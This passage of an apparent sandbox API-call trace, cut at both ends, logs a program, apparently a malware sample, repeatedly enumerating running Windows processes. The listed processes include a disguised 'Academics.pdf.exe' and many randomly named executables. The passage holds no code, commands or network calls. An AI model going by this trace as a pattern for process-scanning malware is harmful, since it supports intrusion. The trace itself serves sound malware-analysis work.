lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0283.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0283.842] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.843] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0283.844] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0283.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0283.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0283.847] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0283.848] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0283.848] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0283.849] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0283.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0283.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0283.852] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0283.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0283.856] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0283.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0283.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0283.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0283.887] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0283.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0283.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0283.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0283.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0283.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0283.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0283.911] CloseHandle (hObject=0x294) returned 1 [0283.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0283.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0283.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0283.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0283.911] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0283.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0283.911] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0283.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0283.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0283.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0283.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0283.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0283.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0283.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0283.913] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.928] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0283.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0283.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0283.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0283.936] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0283.937] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0283.974] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0283.975] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.976] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.977] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.979] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.979] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0283.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0283.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0283.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0283.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0283.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0283.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0283.999] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0284.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0284.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0284.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0284.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0284.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0284.051] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0284.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0284.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0284.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0284.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0284.056] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0284.060] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0284.063] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0284.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0284.070] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0284.073] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0284.076] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.078] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0284.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0284.084] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 